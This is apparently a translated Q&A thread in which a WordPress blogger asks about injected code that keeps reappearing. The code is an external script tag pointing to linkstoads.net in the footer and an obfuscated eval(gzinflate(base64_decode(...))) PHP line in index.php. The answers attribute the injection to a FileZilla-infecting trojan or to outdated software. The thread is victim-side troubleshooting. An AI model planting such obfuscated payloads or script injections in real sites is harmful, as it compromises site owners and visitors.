1

最近 (過去 2 週間)、次のコード行が wordpress ブログのフッターに表示されました。

<script type="text/javascript" src="http://linkstoads.net/keller/link.php?id=3" name="linkstats"></script>

私はそれをここに入れませんでした。私はそれが何をするのか分かりません; でも出したい。

初めての試みで、テンプレートを置き換えただけで、数分間消えてしまいました。しかし、それは戻ってきました。

だから私は自分のindex.phpファイル(テンプレートではなく、最初のindex.php)に行き、そのコードを見つけました:

#c3284d#
eval(gzinflate(base64_decode("JcxLDoMwDEXROVL3EHkBeMCsfLqRTKxgKYE0WLFVtbsvkOnRe5dDPBxMGmoSc/YTnj0Yfw03+lBjD05rOD2ayRMxp7KrHbRqX9hw55y53tpLlFda5+G8FHpfrTYmUw/LhC24wPjo/g==")));
#/c3284d#

それで削除しましたが、翌日また戻ってきました。

そんなことがあるものか ?私はウイルスとセキュリティの初心者なので、答えは本当に基本的なものかもしれません.

4

2 に答える 2

0

問題は解決しました。WordPressはその責任を負いません。

filezillaに感染するトロイの木馬があり、それを開くと、filezillaを介して到達できるすべてのページにコードが挿入されます。

これは本当に大きな問題であり、3つのアンチウイルスはそれを見つけることさえできませんでした。

それが表示された場合は、コンピューターをフォーマットしてください。

于 2012-11-22T16:16:50.400 に答える
0

おめでとう!あなたは乗っ取られている!かなり長い間ソフトウェアを更新しておらず、複数のハッカーがソフトウェアの既知の脆弱性を悪用している可能性があります。

どのように修正しますか?焦土... あなたは多くのボットにハッキングされており、おそらく売春婦のようにオンラインで売られています。Web ルート全体を削除して、最初からやり直してください。すべてのプラグインとWordpressが最新バージョンであることを確認してください。

記録として、Wordpress はサル、子供、または子供のサルによって書かれました... いずれにせよ、それは私が今までハッキングした中で断然最悪のアプリケーションの 1 つです。彼らはおそらくあなたのパスワード ハッシュをセッション ID として使用しているでしょう。

ああ、ハッキングされ続けるなら、 より高い専門家.

于 2012-10-27T01:09:08.370 に答える